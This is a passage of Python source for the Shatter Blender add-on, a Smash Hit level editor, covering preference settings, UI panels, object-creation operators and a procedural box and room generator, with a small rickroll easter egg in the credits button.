##\n\tforce_disallow_import: BoolProperty(\n\t\tname = \"Always disallow import\",\n\t\tdescription = \"Enabling this option will force every segment to have the \\\"disallow import\\\" flag set, even if you did not configure it via the obstacle panel. Please note that marking segments with this flag does not prevent someone bypassing it\",\n\t\tdefault = False,\n\t)\n\t\n\tsegment_encrypt: BoolProperty(\n\t\tname = \"Obfuscate exported segments (alpha)\",\n\t\tdescription = \"This will obfuscate segments using a very basic implementation of the XTEA-CTR cipher. THIS IS NOT INTENDED TO BE SECURE OR CONFIDENTIAL IN ANY WAY. Note: In the future there may be mods that allow loading encrypted segments and providing some protection against copying, but this does not exist yet and so this is only for development right now\",\n\t\tdefault = False,\n\t)\n\t\n\t# Yes, I technically imply that this is not a \"password\" even though it is.\n\t# But really I don't want ppl to use their one password for everything (ugh)\n\t# in this. Maybe it would be better to switch to a keyfile of some kind?\n\tsegment_encrypt_password: StringProperty(\n\t\tname = \"Keyphrase\",\n\t\tdescription = \"The unique keyphrase to obfuscate segments with. This should be a mix of random symbols, similar to a password, but does not need to be memorable\",\n\t\t# subtype = \"PASSWORD\",\n\t\tdefault = \"\",\n\t)\n\t\n\t## Other shatter stuff ##\n\tuid: StringProperty(\n\t\tname = \"uid\",\n\t\tdescription = \"user id\",\n\t\tsubtype = \"PASSWORD\",\n\t\tdefault = \"\",\n\t)\n\t\n\tdef draw(self, context):\n\t\tmain = self.layout\n\t\t\n\t\tui = butil.UIDrawingHelper(context, self.layout, self)\n\t\t\n\t\tui.region(\"PREFERENCES\", \"General options\")\n\t\tui.prop(\"default_assets_path\")\n\t\tui.prop(\"enable_segment_warnings\")\n\t\tui.prop(\"resolve_templates\")\n\t\tui.prop(\"compact_ui\")\n\t\tui.end()\n\t\t\n\t\tui.region(\"WORLD\", \"Network features\")\n\t\tui.label(f\"Your unique user ID: {self.uid}\")\n\t\tui.prop(\"enable_quick_test_server\")\n\t\tui.prop(\"enable_update_notifier\")\n\t\tui.prop(\"updater_channel\")\n\t\t\n\t\tif (self.enable_update_notifier):\n\t\t\tui.prop(\"enable_auto_update\")\n\t\t\t\n\t\t\tif (self.enable_auto_update):\n\t\t\t\tui.warn(\"Please note: If a bad update is released, it might break Shatter. 
Be careful!\")\n\t\t\n\t\tui.prop(\"enable_bad_check\")\n\t\tui.end()\n\t\t\n\t\tui.region(\"LOCKED\", \"Protection\")\n\t\tui.prop(\"force_disallow_import\")\n\t\tui.prop(\"segment_encrypt\")\n\t\t\n\t\tif (self.segment_encrypt):\n\t\t\tui.prop(\"segment_encrypt_password\")\n\t\t\tui.op(\"shatter.obfuscation_randomise_keyphrase\")\n\t\t\tui.warn(\"Segment obfuscation is not supported ingame. Developers only!\")\n\t\t\n\t\tui.end()\n\t\t\n\t\tui.region(\"INFO\", \"About Shatter\")\n\t\tui.op(\"shatter.open_credits_page\")\n\t\tui.op(\"shatter.open_privacy_page\")\n\t\t\n\t\tif (g_got_ricked):\n\t\t\tui.region(\"INFO\", \"Trolled !!!\", new = False)\n\t\t\tui.label(\"Anyway, I hope you are doing well in life :)\")\n\t\t\tui.label(\"-- Knot126\")\n\t\t\tui.end()\n\t\t\n\t\tui.end()\n\nclass RandomiseKeyphrase(Operator):\n\tbl_idname = \"shatter.obfuscation_randomise_keyphrase\"\n\tbl_label = \"Randomise keyphrase\"\n\t\n\tdef execute(self, context):\n\t\tp = get_prefs()\n\t\tp.segment_encrypt_password = util.randpw()\n\t\treturn {\"FINISHED\"}\n\nclass sh_SegmentPanel(Panel):\n\tbl_label = \"Smash Hit\"\n\tbl_idname = \"OBJECT_PT_segment_panel\"\n\tbl_space_type = \"VIEW_3D\"\n\tbl_region_type = \"UI\"\n\tbl_category = \"Scene\"\n\t\n\t@classmethod\n\tdef poll(self, context):\n\t\treturn True\n\t\n\tdef draw(self, context):\n\t\tlayout = self.layout\n\t\tscene = context.scene\n\t\tsh_properties = scene.sh_properties\n\t\t\n\t\tsub = layout.box()\n\t\tsub.label(text = \"Location\", icon = \"NODE\")\n\t\tsub.prop(sh_properties, \"sh_level\")\n\t\tsub.prop(sh_properties, \"sh_room\")\n\t\tsub.prop(sh_properties, \"sh_segment\")\n\t\t\n\t\tsub = layout.box()\n\t\tsub.label(text = \"Segment data\", icon = \"SCENE_DATA\")\n\t\tsub.prop(sh_properties, \"sh_auto_length\", toggle = 1)\n\t\tif (not sh_properties.sh_auto_length):\n\t\t\tsub.prop(sh_properties, \"sh_len\")\n\t\tsub.prop(sh_properties, \"sh_box_bake_mode\")\n\t\tsub.prop(sh_properties, \"sh_template\")\n\t\tsub.prop(sh_properties, \"sh_default_template\")\n\t\tsub.prop(sh_properties, \"sh_softshadow\")\n\t\tsub.prop(sh_properties, \"sh_vrmultiply\")\n\t\t\n\t\tbake_mode = sh_properties.sh_box_bake_mode\n\t\t\n\t\tif (bake_mode == \"Mesh\"):\n\t\t\t# Lighting\n\t\t\tsub = layout.box()\n\t\t\tsub.label(text = \"Light\", icon = \"LIGHT\")\n\t\t\t# sub.prop(sh_properties, \"sh_basic_lighting\")\n\t\t\t#if (sh_properties.sh_basic_lighting):\n\t\t\tif (True):\n\t\t\t\tsub.prop(sh_properties, \"sh_light_right\")\n\t\t\t\tsub.prop(sh_properties, \"sh_light_left\")\n\t\t\t\tsub.prop(sh_properties, \"sh_light_top\")\n\t\t\t\tsub.prop(sh_properties, \"sh_light_bottom\")\n\t\t\t\tsub.prop(sh_properties, \"sh_light_front\")\n\t\t\t\tsub.prop(sh_properties, \"sh_light_back\")\n\t\t\t\n\t\t\tsub.prop(sh_properties, \"sh_lighting\")\n\t\t\tif (sh_properties.sh_lighting):\n\t\t\t\tsub.prop(sh_properties, \"sh_lighting_ambient\")\n\t\t\t\n\t\t\t# Mesh settings\n\t\t\tsub = layout.box()\n\t\t\tsub.label(text = \"Meshes\", icon = \"MESH_DATA\")\n\t\t\tsub.prop(sh_properties, \"sh_menu_segment\")\n\t\t\tsub.prop(sh_properties, \"sh_ambient_occlusion\")\n\t\t\n\t\tif (bake_mode == \"StoneHack\"):\n\t\t\tsub = layout.box()\n\t\t\tsub.label(text = \"Stone\", icon = \"UV_DATA\")\n\t\t\tsub.prop(sh_properties, \"sh_stone_obstacle_name\")\n\t\t\tsub.prop(sh_properties, \"sh_legacy_colour_model\")\n\t\t\tif (sh_properties.sh_legacy_colour_model):\n\t\t\t\tsub.prop(sh_properties, \"sh_legacy_colour_default\")\n\t\t\n\t\t# Quick test\n\t\tif 
(bpy.context.preferences.addons[\"shatter\"].preferences.enable_quick_test_server):\n\t\t\tsub = layout.box()\n\t\t\tsub.label(text = \"Quick test\", icon = \"AUTO\")\n\t\t\tsub.prop(sh_properties, \"sh_fog_colour_top\")\n\t\t\tsub.prop(sh_properties, \"sh_fog_colour_bottom\")\n\t\t\tsub.prop(sh_properties, \"sh_room_length\")\n\t\t\tsub.prop(sh_properties, \"sh_gravity\")\n\t\t\tsub.prop(sh_properties, \"sh_music\")\n\t\t\tsub.prop(sh_properties, \"sh_echo\")\n\t\t\tsub.prop(sh_properties, \"sh_reverb\")\n\t\t\tsub.prop(sh_properties, \"sh_particles\")\n\t\t\tsub.prop(sh_properties, \"sh_difficulty\")\n\t\t\tsub.prop(sh_properties, \"sh_extra_code\")\n\t\t\tsub.label(text = f\"Your IP: {util.get_local_ip()}\")\n\t\t\n\t\t# DRM\n\t\tif (not bpy.context.preferences.addons[\"shatter\"].preferences.force_disallow_import):\n\t\t\tsub = layout.box()\n\t\t\tsub.label(text = \"Protection\", icon = \"LOCKED\")\n\t\t\tsub.prop(sh_properties, \"sh_drm_disallow_import\")\n\t\t\n\t\tlayout.separator()\n\nclass sh_ItemPropertiesPanel(Panel):\n\tbl_label = \"Smash Hit\"\n\tbl_idname = \"OBJECT_PT_obstacle_panel\"\n\tbl_space_type = \"VIEW_3D\" \n\tbl_region_type = \"UI\"\n\tbl_category = \"Item\"\n\tbl_context = \"objectmode\"\n\t\n\t@classmethod\n\tdef poll(self, context):\n\t\treturn context.object is not None\n\t\n\tdef draw(self, context):\n\t\tlayout = self.layout\n\t\tobject = context.object\n\t\tsh_properties = object.sh_properties\n\t\t\n\t\tui = butil.UIDrawingHelper(context, layout, sh_properties, compact = get_prefs().compact_ui)\n\t\t\n\t\t# All objects will have all properties, but only some will be used for\n\t\t# each type of object.\n\t\tt = ui.prop(\"sh_type\", text = \"\")\n\t\tui.prop(\"sh_template\")\n\t\t\n\t\tif (t == \"BOX\"):\n\t\t\tui.prop(\"sh_visible\", disabled = not not ui.get(\"sh_template\"))\n\t\t\t\n\t\t\t# silly little loop wrapper :-3\n\t\t\tfor x in [\"tint\", \"tile\"]:\n\t\t\t\tword = {\"tint\": \"Colour\", \"tile\": \"Tile\"}[x]\n\t\t\t\t\n\t\t\t\tui.region(\n\t\t\t\t\t{\"tint\": \"COLOR\", \"tile\": \"TEXTURE\"}[x],\n\t\t\t\t\tword,\n\t\t\t\t)\n\t\t\t\t\n\t\t\t\tif (ui.get(f\"sh_use_multi{x}\")):\n\t\t\t\t\tui.prop(f\"sh_use_multi{x}\", text = \"Uniform\", text_compact = f\"Uniform {word.lower()}\", use_button = True)\n\t\t\t\t\tui.prop(f\"sh_{x}1\")\n\t\t\t\t\tui.prop(f\"sh_{x}2\")\n\t\t\t\t\tui.prop(f\"sh_{x}3\")\n\t\t\t\telse:\n\t\t\t\t\tui.prop(f\"sh_use_multi{x}\", text = \"Per axis\", text_compact = f\"Per axis {word.lower()}\", use_button = True)\n\t\t\t\t\tui.prop(f\"sh_{x}\")\n\t\t\t\t\n\t\t\t\tui.end()\n\t\t\t\n\t\t\tif (context.scene.sh_properties.sh_lighting):\n\t\t\t\tui.region(\"LIGHT\", \"Light\")\n\t\t\t\tui.prop(\"sh_glow\")\n\t\t\t\tui.end()\n\t\t\t\n\t\t\tui.region(\"GRAPH\", \"Tile transforms\")\n\t\t\tui.prop(\"sh_tilesize\")\n\t\t\tui.prop(\"sh_tilerot\")\n\t\t\tui.end()\n\t\t\t\n\t\t\tui.prop(\"sh_reflective\")\n\t\telif (t == \"OBS\"):\n\t\t\tui.region(\"COPY_ID\", \"Type\")\n\t\t\tui.prop(\"sh_use_chooser\", use_button = True)\n\t\t\tui.prop(\"sh_obstacle_chooser\" if ui.get(\"sh_use_chooser\") else \"sh_obstacle\", text = \"\", text_compact = \"Type\")\n\t\t\tui.end()\n\t\t\t\n\t\t\tui.region(\"HIDE_OFF\", \"Visibility\")\n\t\t\tui.prop(\"sh_mode\")\n\t\t\tui.prop(\"sh_difficulty\")\n\t\t\tui.end()\n\t\t\t\n\t\t\tui.region(\"SETTINGS\", \"Templates\")\n\t\t\tfor i in range(12):\n\t\t\t\tui.prop(f\"sh_param{i}\", text = \"\", text_compact = f\"Param {i}\", disabled = (i == 0) and (ui.get(\"sh_template\") != 
\"\"))\n\t\t\tui.end()\n\t\telif (t == \"DEC\"):\n\t\t\tui.region(\"TEXTURE\", \"Sprite\")\n\t\t\tui.prop(\"sh_decal\")\n\t\t\tui.end()\n\t\t\t\n\t\t\tui.region(\"COLOR\", \"Colour\")\n\t\t\tui.prop(\"sh_havetint\", use_button = True, icon = \"COLOR\")\n\t\t\tif (ui.get(\"sh_havetint\")):\n\t\t\t\tui.prop(\"sh_tint\")\n\t\t\tui.prop(\"sh_blend\")\n\t\t\tui.end()\n\t\t\t\n\t\t\tif (context.object.dimensions[1] == 0.0 and context.object.dimensions[2] == 0.0):\n\t\t\t\tui.region(\"SETTINGS\", \"Size\")\n\t\t\t\tui.prop(\"sh_size\")\n\t\t\t\tui.end()\n\t\t\t\n\t\t\tui.region(\"HIDE_OFF\", \"Visibility\")\n\t\t\tui.prop(\"sh_difficulty\")\n\t\t\tui.end()\n\t\telif (t == \"POW\"):\n\t\t\tui.prop(\"sh_powerup\")\n\t\t\tui.prop(\"sh_difficulty\")\n\t\telif (t == \"WAT\"):\n\t\t\tpass\n\t\t\n\t\tui.prop(\"sh_hidden\")\n\t\tui.prop(\"sh_export\")\n\nclass sh_CreateBox(Operator):\n\t\"\"\"\n\tOperator to create a box\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.create_box\"\n\tbl_label = \"Create box\"\n\t\n\tdef execute(self, context):\n\t\to = butil.add_box((0,0,0), (1,1,1))\n\t\t\n\t\treturn {\"FINISHED\"}\n\nclass sh_CreateObstacle(Operator):\n\t\"\"\"\n\tOperator to create a obstacle\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.create_obstacle\"\n\tbl_label = \"Create obstacle\"\n\t\n\tdef execute(self, context):\n\t\to = butil.add_empty()\n\t\to.sh_properties.sh_type = \"OBS\"\n\t\t\n\t\treturn {\"FINISHED\"}\n\nclass sh_CreateDecal(Operator):\n\t\"\"\"\n\tOperator to create a decal\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.create_decal\"\n\tbl_label = \"Create decal\"\n\t\n\tdef execute(self, context):\n\t\to = butil.add_empty()\n\t\to.sh_properties.sh_type = \"DEC\"\n\t\t\n\t\treturn {\"FINISHED\"}\n\nclass sh_CreatePowerup(Operator):\n\t\"\"\"\n\tOperator to create a powerup\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.create_powerup\"\n\tbl_label = \"Create powerup\"\n\t\n\tdef execute(self, context):\n\t\to = butil.add_empty()\n\t\to.sh_properties.sh_type = \"POW\"\n\t\t\n\t\treturn {\"FINISHED\"}\n\nclass sh_CreateWater(Operator):\n\t\"\"\"\n\tOperator to create a water\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.create_water\"\n\tbl_label = \"Create water\"\n\t\n\tdef execute(self, context):\n\t\to = butil.add_box((0,0,0), (1,1,0))\n\t\to.sh_properties.sh_type = \"WAT\"\n\t\t\n\t\treturn {\"FINISHED\"}\n\nclass SHATTER_MT_3DViewportMenuExtras(Menu):\n\tbl_label = \"Extra features\"\n\t\n\tdef draw(self, context):\n\t\tself.layout.operator(\"shatter.export_level_package\")\n\t\tself.layout.separator()\n\t\tself.layout.operator(\"shatter.rebake_meshes\")\n\t\tself.layout.separator()\n\t\tself.layout.operator(\"shatter.segstrate_auto\")\n\t\tself.layout.operator(\"shatter.segstrate_static\")\n\nclass OpenShatterCreditsPage(Operator):\n\t\"\"\"\n\tOperator to create a water\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.open_credits_page\"\n\tbl_label = \"Credits and Third Party Libraries\"\n\t\n\tdef execute(self, context):\n\t\tif (secrets.randbelow(150) == 0):\n\t\t\tglobal g_got_ricked\n\t\t\twebbrowser.open(f\"https://www.youtube.com/watch?v=dQw4w9WgXcQ\")\n\t\t\tg_got_ricked = True\n\t\telse:\n\t\t\twebbrowser.open(f\"https://github.com/Shatter-Team/Shatter/blob/trunk/CREDITS.md\")\n\t\treturn {\"FINISHED\"}\n\nclass OpenShatterPrivacyPage(Operator):\n\t\"\"\"\n\tOperator to create a water\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.open_privacy_page\"\n\tbl_label = \"Privacy and Security Statement\"\n\t\n\tdef execute(self, context):\n\t\twebbrowser.open(f\"https://shatter-team.github.io/Shatter/privacy.html\")\n\t\treturn 
{\"FINISHED\"}\n\nclass SHATTER_MT_3DViewportMenu(Menu):\n\tbl_label = \"Shatter\"\n\t\n\tdef draw(self, context):\n\t\tself.layout.menu(\"SHATTER_MT_3DViewportMenuExtras\")\n\t\t\n\t\tself.layout.separator()\n\t\t\n\t\tfor t in [(\"box\", \"MESH_CUBE\"), (\"obstacle\", \"MESH_CONE\"), (\"decal\", \"TEXTURE\"), (\"powerup\", \"SOLO_OFF\"), (\"water\", \"MATFLUID\")]:\n\t\t\tself.layout.operator(f\"shatter.create_{t[0]}\", icon = t[1])\n\t\t\n\t\tself.layout.separator()\n\t\t\n\t\tself.layout.operator(\"shatter.export_auto\", icon = \"MOD_BEVEL\")\n\t\tself.layout.operator(\"shatter.export_test_server\", icon = \"AUTO\")\n\ndef SHATTER_MT_3DViewportMenu_draw(self, context):\n\tself.layout.menu(\"SHATTER_MT_3DViewportMenu\")\n\n################################################################################\n# UTILITIES AND STUFF\n################################################################################\n\ndef run_updater():\n\ttry:\n\t\tupdater.check_for_updates(common.BL_INFO[\"version\"])\n\texcept Exception as e:\n\t\timport traceback\n\t\tprint(f\"Shatter for Blender: Had an exception whilst checking for updates:\")\n\t\tprint(traceback.format_exc())\n\ndef update_uid():\n\tuid_file = f\"{common.SHATTER_PATH}/data/uid\"\n\tuid_from_file = util.get_file(uid_file)\n\t\n\tuid_from_blender = get_prefs().uid\n\t\n\tif (not uid_from_blender):\n\t\tif (not uid_from_file):\n\t\t\t# Never had a uid before\n\t\t\tnew_uid = generate_uid()\n\t\t\tbpy.context.preferences.addons[\"shatter\"].preferences.uid = new_uid\n\t\t\tutil.set_file(uid_file, new_uid)\n\t\telse:\n\t\t\t# We have the file but not the saved uid, probably the user\n\t\t\t# reinstalled\n\t\t\tbpy.context.preferences.addons[\"shatter\"].preferences.uid = uid_from_file.replace(\"\\n\", \"\")\n\ndef generate_uid():\n\ts = secrets.token_hex(16)\n\treturn f\"{s[0:8]}-{s[8:16]}-{s[16:24]}-{s[24:32]}\"\n\n###############\n### AUTOGEN ###\n###############\n\nclass AutogenProperties(PropertyGroup):\n\t\n\tseed: IntProperty(\n\t\tname = \"Seed\",\n\t\tdescription = \"The seed to feed to the randomiser. Knowing the seed that you will run with allows you to recreate the exact results later\",\n\t\tdefault = 0,\n\t)\n\t\n\tauto_randomise: BoolProperty(\n\t\tname = \"Auto randomise\",\n\t\tdescription = \"Automatically generate a new, random seed every time a generation action is run\",\n\t\tdefault = True,\n\t)\n\t\n\ttype: EnumProperty(\n\t\tname = \"Type\",\n\t\tdescription = \"Type of thing you would like to generate\",\n\t\titems = [\n\t\t\t('BasicRoom', \"Room structure\", \"Adds a basic room-like structure, optionally including a door area\"),\n\t\t\t('SingleRow', \"Row of boxes\", \"A single row of boxes, often used before and after chasms. 
Look at the first room of the game for an example of this\"),\n\t\t\t('ArchWay', \"Archway\", \"Creates an arch-like structure with bumps and floor parts\"),\n\t\t],\n\t\tdefault = \"SingleRow\",\n\t)\n\t\n\talgorithm: EnumProperty(\n\t\tname = \"Algorithm\",\n\t\tdescription = \"Algorithm to use to generate the thing\",\n\t\titems = [\n\t\t\t('ActualRandom', \"ActualRandom\", \"Purely random box heights\"),\n\t\t\t('UpAndDownPath', \"UpAndDownPath\", \"\"),\n\t\t\t('ArithmeticProgressionSet', \"ArithmeticProgressionSet\", \"Randomly selected from a subset of an arithmetic series (ex: random of 1/2, 1/4, 1/6)\"),\n\t\t\t('GeometricProgressionSet', \"GeometricProgressionSet\", \"Randomly selected from a subset of a geometric series (ex: random of 1/2, 1/4, 1/8)\"),\n\t\t],\n\t\tdefault = \"ActualRandom\",\n\t)\n\t\n\ttemplate: StringProperty(\n\t\tname = \"Template\",\n\t\tdescription = \"Template to use for these boxes. You can also select a target box to copy properties from that box\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsize: FloatVectorProperty(\n\t\tname = \"Box size\",\n\t\tdescription = \"First is width, second is depth. Height is the random part\",\n\t\tdefault = (1.0, 1.0), \n\t\tmin = 0.0625,\n\t\tmax = 16.0,\n\t\tsize = 2,\n\t)\n\t\n\tmax_height: FloatProperty(\n\t\tname = \"Max height\",\n\t\tdescription = \"\",\n\t\tdefault = 0.5,\n\t\tmin = 0.0,\n\t\tmax = 16.0,\n\t)\n\t\n\t### Up and down path options ###\n\t\n\tudpath_start: FloatProperty(\n\t\tname = \"Initial height\",\n\t\tdescription = \"\",\n\t\tdefault = 0.25,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tudpath_step: FloatProperty(\n\t\tname = \"Step\",\n\t\tdescription = \"\",\n\t\tdefault = 0.125,\n\t\tmin = 0.0,\n\t\tmax = 0.5,\n\t)\n\t\n\tudpath_minmax: FloatVectorProperty(\n\t\tname = \"Min/max height\",\n\t\tdescription = \"\",\n\t\tdefault = (0.125, 0.5), \n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t\tsize = 2,\n\t)\n\t\n\t### Geometric/Arithmetic progression generator options ###\n\t\n\tgeometric_ratio: FloatProperty(\n\t\tname = \"Ratio\",\n\t\tdescription = \"\",\n\t\tdefault = 0.5,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tgeometric_exponent_minmax: IntVectorProperty(\n\t\tname = \"Exponent\",\n\t\tdescription = \"\",\n\t\tdefault = (1, 4),\n\t\tmin = 0,\n\t\tmax = 16,\n\t\tsize = 2,\n\t)\n\t\n\tgeometric_require_unique: BoolProperty(\n\t\tname = \"No repeating heights\",\n\t\tdescription = \"\",\n\t\tdefault = False,\n\t)\n\t\n\t### Room ###\n\t\n\troom_length: FloatProperty(\n\t\tname = \"Length\",\n\t\tdescription = \"\",\n\t\tdefault = 16.0,\n\t\tmin = 1.0,\n\t\tmax = 1024.0,\n\t)\n\t\n\troom_door_part: BoolProperty(\n\t\tname = \"Door part\",\n\t\tdescription = \"\",\n\t\tdefault = False,\n\t)\n\t\n\troom_yoffset: FloatProperty(\n\t\tname = \"Height offset\",\n\t\tdescription = \"How high or low the room will appear to the player\",\n\t\tdefault = 1.0,\n\t\tmin = -15.0,\n\t\tmax = 15.0,\n\t)\n\t\n\t### Arch ###\n\t\n\tarch_top_parts: BoolProperty(\n\t\tname = \"Top decorations\",\n\t\tdescription = \"\",\n\t\tdefault = True,\n\t)\n\nclass AutogenPanel(Panel):\n\tbl_label = \"Shatter Autogen\"\n\tbl_idname = \"OBJECT_PT_autogen_panel\"\n\tbl_space_type = \"VIEW_3D\"\n\tbl_region_type = \"UI\"\n\tbl_category = \"Autogen\"\n\t\n\t@classmethod\n\tdef poll(self, context):\n\t\treturn True\n\t\n\tdef draw(self, context):\n\t\tlayout = self.layout\n\t\tprops = context.scene.shatter_autogen\n\t\t\n\t\tsub = layout.box()\n\t\tsub.label(text = \"Seed\", icon = \"GRAPH\")\n\t\tsub.prop(props, 
\"auto_randomise\")\n\t\tif (not props.auto_randomise):\n\t\t\tsub.prop(props, \"seed\")\n\t\t\tsub.operator(\"shatter.randomise_autogen_seed\", text = \"Randomise seed\")\n\t\t\n\t\tsub = layout.box()\n\t\tsub.label(text = \"Generate\", icon = \"BRUSHES_ALL\")\n\t\tsub.prop(props, \"type\")\n\t\tif (props.type == \"SingleRow\"):\n\t\t\tsub.prop(props, \"algorithm\")\n\t\tif (not context.object):\n\t\t\tsub.prop(props, \"template\")\n\t\telse:\n\t\t\tsub.label(text = \"Copying props from selected\")\n\t\tif (props.type == \"SingleRow\" and props.algorithm != \"ArithmeticProgressionSet\"):\n\t\t\tsub.prop(props, \"max_height\")\n\t\tsub.prop(props, \"size\")\n\t\t\n\t\t# Single row options\n\t\tif (props.type == \"SingleRow\"):\n\t\t\tif (props.algorithm in [\"UpAndDownPath\"]):\n\t\t\t\tsub.prop(props, \"udpath_start\")\n\t\t\t\tsub.prop(props, \"udpath_step\")\n\t\t\t\tsub.prop(props, \"udpath_minmax\")\n\t\t\t\n\t\t\tif (props.algorithm in [\"GeometricProgressionSet\", \"ArithmeticProgressionSet\"]):\n\t\t\t\tsub.prop(props, \"geometric_ratio\")\n\t\t\t\tsub.prop(props, \"geometric_exponent_minmax\", text = \"Exponent\" if props.algorithm.startswith(\"G\") else \"Scalar\")\n\t\t\t\tsub.prop(props, \"geometric_require_unique\")\n\t\t\n\t\t# Room options\n\t\tif (props.type == \"BasicRoom\"):\n\t\t\tsub.prop(props, \"room_length\")\n\t\t\tsub.prop(props, \"room_yoffset\")\n\t\t\tsub.prop(props, \"room_door_part\")\n\t\t\n\t\t# Archway\n\t\tif (props.type == \"ArchWay\"):\n\t\t\tsub.prop(props, \"arch_top_parts\")\n\t\t\n\t\tsub.operator(\"shatter.run_autogen\", text = \"Generate\")\n\t\t\n\t\tlayout.separator()\n\nclass RunRandomiseSeedAction(bpy.types.Operator):\n\t\"\"\"\n\tRun the seed randomiser action\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.randomise_autogen_seed\"\n\tbl_label = \"Randomise Autogen Seed\"\n\t\n\tdef execute(self, context):\n\t\tcontext.scene.shatter_autogen.seed = random.randint(0, 2 ** 31 - 1)\n\t\t\n\t\treturn {'FINISHED'}\n\nclass BlenderPlacer:\n\t\"\"\"\n\tProvides an interface for the autogenerator to create boxes in blender in\n\ta generic way.\n\t\"\"\"\n\t\n\tdef __init__(self, basePos, baseSize, param3):\n\t\tif (basePos and baseSize):\n\t\t\tself.setBase(basePos, baseSize)\n\t\t\n\t\t# This is probably a bit insane, but it's probably not the worst way of\n\t\t# doing this...\n\t\tif (type(param3) == str):\n\t\t\tself.template = param3\n\t\telse:\n\t\t\tself.visible_object_props = param3.sh_properties\n\t\t\n\t\tself.objects = []\n\t\n\tdef setBase(self, basePos, baseSize):\n\t\t\"\"\"\n\t\tMake a base box from the blender location and size\n\t\t\"\"\"\n\t\t\n\t\tself.base = autogen.Box(autogen.Vector3(basePos[1], basePos[2], basePos[0]), autogen.Vector3(baseSize[1] / 2, baseSize[2] / 2, baseSize[0] / 2))\n\t\n\tdef getBase(self):\n\t\t\"\"\"\n\t\tGet the base box as a generic box\n\t\t\"\"\"\n\t\t\n\t\treturn self.base if hasattr(self, \"base\") else None\n\t\n\tdef inheritProperties(self, obj, template_append = \"\"):\n\t\t\"\"\"\n\t\tInherit the template or visible properties\n\t\t\"\"\"\n\t\t\n\t\t# Use the base box if one exists, otherwise just fallback to using the\n\t\t# template value\n\t\tif (hasattr(self, \"base\")):\n\t\t\tupdate_properties = [\"sh_visible\", \"sh_template\", \"sh_tint\", \"sh_use_multitint\", \"sh_tint1\", \"sh_tint2\", \"sh_tint3\", \"sh_tile\", \"sh_use_multitile\", \"sh_tile1\", \"sh_tile2\", \"sh_tile3\", \"sh_tilerot\", \"sh_tilesize\"]\n\t\t\t\n\t\t\tfor prop in update_properties:\n\t\t\t\tval = 
getattr(self.visible_object_props, prop)\n\t\t\t\tsetattr(obj.sh_properties, prop, val)\n\t\telse:\n\t\t\tobj.sh_properties.sh_template = self.template + template_append\n\t\n\tdef addBox(self, box):\n\t\t\"\"\"\n\t\tAdd a box to the scene\n\t\t\"\"\"\n\t\t\n\t\t# Add the mesh\n\t\tbpy.ops.mesh.primitive_cube_add(size = 1.0, location = (box.pos.z, box.pos.x, box.pos.y), scale = (box.size.z * 2, box.size.x * 2, box.size.y * 2))\n\t\t\n\t\t# The added mesh is always selected after, so we do this to get the object\n\t\tbox = bpy.context.active_object\n\t\t\n\t\t# Set the template or visible settings\n\t\tself.inheritProperties(box)\n\t\t\n\t\t# Append the box to the list of objects we have made\n\t\tself.objects.append(box)\n\t\n\tdef addObstacle(self, obs):\n\t\t\"\"\"\n\t\tAdd an obstacle to the scene\n\t\t\"\"\"\n\t\t\n\t\to = bpy.data.objects.new(\"empty\", None)\n\t\t\n\t\tbpy.context.scene.collection.objects.link(o)\n\t\t\n\t\to.empty_display_size = 1\n\t\to.empty_display_type = \"PLAIN_AXES\"\n\t\t\n\t\to.location = (obs.pos.z, obs.pos.x, obs.pos.y)\n\t\t\n\t\to.sh_properties.sh_type = \"OBS\"\n\t\to.sh_properties.sh_obstacle = obs.type\n\t\tself.inheritProperties(o, \"_glass\")\n\t\t\n\t\tself.objects.append(o)\n\t\n\tdef addDecal(self, dec):\n\t\t\"\"\"\n\t\tAdd a new decal to the scene\n\t\t\"\"\"\n\t\t\n\t\to = bpy.data.objects.new(\"empty\", None)\n\t\t\n\t\tbpy.context.scene.collection.objects.link(o)\n\t\t\n\t\to.empty_display_size = 1\n\t\to.empty_display_type = \"PLAIN_AXES\"\n\t\t\n\t\to.location = (dec.pos.z, dec.pos.x, dec.pos.y)\n\t\t\n\t\to.sh_properties.sh_type = \"DEC\"\n\t\to.sh_properties.sh_decal = dec.id\n\t\tself.inheritProperties(o)\n\t\t\n\t\tself.objects.append(o)\n\t\n\tdef selectAll(self):\n\t\t\"\"\"\n\t\tSelect all objects that were part of this round\n\t\t\"\"\"\n\t\t\n\t\tfor o in self.objects:\n\t\t\to.select_set(True)\n\nclass RunAutogenAction(bpy.types.Operator):\n\t\"\"\"\n\tRun the automatic generator\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.run_autogen\"\n\tbl_label = \"Run Shatter Autogen\"\n\t\n\tdef execute(self, context):\n\t\t\"\"\"\n\t\tFurries Furries Furries Furries Furries Furries Furries Furries Furries\n\t\tFurries Furries Furries Furries Furries Furries Furries Furries Furries\n\t\tFurries Furries Furries Furries Furries Furries Furries Furries Furries\n\t\tFurries Furries Furries Furries Furries Furries Furries Furries Furries\n\t\t\"\"\"\n\t\t\n\t\tprops = context.scene.shatter_autogen\n\t\t\n\t\tif (props.auto_randomise):\n\t\t\tcontext.scene.shatter_autogen.seed = random.randint(0, 2 ** 31 - 1)\n\t\t\n\t\tplacer = BlenderPlacer(\n\t\t\tcontext.object.location if context.object else None,\n\t\t\tcontext.object.dimensions if context.object else None,\n\t\t\tcontext.object if context.object and (context.object.sh_properties.sh_visible or not props.template) else props.template,\n\t\t)\n\t\t\n\t\tparams = {\n\t\t\t\"seed\": props.seed,\n\t\t\t\"type\": props.type,\n\t\t\t\"size\": props.size,\n\t\t\t\"max_height\": props.max_height,\n\t\t}\n\t\t\n\t\t# For all single row types\n\t\tif (props.type == \"SingleRow\"):\n\t\t\t# Check if a box is currently selected, error if not\n\t\t\tif (not placer.getBase()):\n\t\t\t\tbutil.show_message(\"Shatter Autogen error\", \"To use the single row generator, please select a box to build on top of.\")\n\t\t\t\treturn {\"FINISHED\"}\n\t\t\t\n\t\t\tparams[\"algorithm\"] = 